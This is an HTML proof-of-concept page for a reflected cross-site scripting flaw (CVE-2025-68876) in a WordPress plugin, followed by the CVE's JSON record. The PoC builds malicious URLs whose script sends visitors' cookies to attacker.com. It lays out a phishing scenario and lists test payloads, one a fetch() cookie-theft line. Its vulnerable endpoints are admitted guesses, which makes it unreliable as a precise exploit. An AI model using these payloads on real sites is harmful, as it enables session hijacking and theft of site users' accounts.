CVE-2025-68876

<!-- CVE-2025-68876 Reflected XSS PoC for Invelity SPS connect --> <!-- Target: WordPress plugin Invelity SPS connect <= 1.0.8 --> <!-- Attack Type: Reflected Cross-Site Scripting --> <!DOCTYPE html> <html> <head> <title>CVE-2025-68876 PoC</title> </head> <body> <h2>CVE-2025-68876 Reflected XSS PoC</h2> <p>Target: Invelity SPS connect WordPress Plugin <= 1.0.8</p> <!-- Malicious URL that exploits the reflected XSS --> <p>Malicious URL:</p> <code id="malicious-url"></code> <script> // Get the WordPress site URL (modify this to your target) var targetUrl = 'https://example.com'; // Construct the malicious URL with XSS payload // The vulnerable parameter depends on plugin implementation var maliciousPayload = '<script>alert("XSS vulnerability CVE-2025-68876");document.location="https://attacker.com/steal?cookie="+document.cookie</script>'; // Common WordPress plugin parameter patterns var vulnerableEndpoints = [ '/?page_id=XXX&invelity_param=' + encodeURIComponent(maliciousPayload), '/wp-admin/admin-ajax.php?action=invelity_sps&param=' + encodeURIComponent(maliciousPayload), '/?invelity_sps_connect=' + encodeURIComponent(maliciousPayload) ]; // Display first vulnerable URL var maliciousUrl = targetUrl + vulnerableEndpoints[0]; document.getElementById('malicious-url').innerHTML = '<a href="' + maliciousUrl + '" target="_blank">' + maliciousUrl + '</a>'; // Display all possible URLs console.log('Possible vulnerable URLs:'); vulnerableEndpoints.forEach(function(url, index) { console.log((index + 1) + ': ' + targetUrl + url); }); </script> <!-- Simulated attack scenario --> <h3>Attack Scenario:</h3> <ol> <li>Attacker crafts a malicious URL containing XSS payload</li> <li>Attacker sends the URL to victim via email, social media, or other channels</li> <li>Victim clicks the link and visits the vulnerable WordPress site</li> <li>Plugin reflects the unsanitized input in the response</li> <li>Victim's browser executes the malicious JavaScript</li> <li>Attacker steals session cookies or performs actions on behalf of victim</li> </ol> <!-- Basic XSS test payloads --> <h3>Test Payloads:</h3> <ul> <li>Basic: <code>&lt;script&gt;alert(1)&lt;/script&gt;</code></li> <li>Img onerror: <code>&lt;img src=x onerror=alert(1)&gt;</code></li> <li>SVG onload: <code>&lt;svg onload=alert(1)&gt;</code></li> <li>Cookie theft: <code>&lt;script&gt;fetch('https://attacker.com/?c='+document.cookie)&lt;/script&gt;</code></li> </ul> </body> </html>

{"cve": {"id": "CVE-2025-68876", "sourceIdentifier": "[email protected]", "published": "2025-12-29T16:15:42.707", "lastModified": "2026-04-23T15:36:10.850", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in INVELITY Invelity SPS connect invelity-sps-connect allows Reflected XSS.This issue affects Invelity SPS connect: from n/a through <= 1.0.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/invelity-sps-connect/vulnerability/wordpress-invelity-sps-connect-plugin-1-0-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}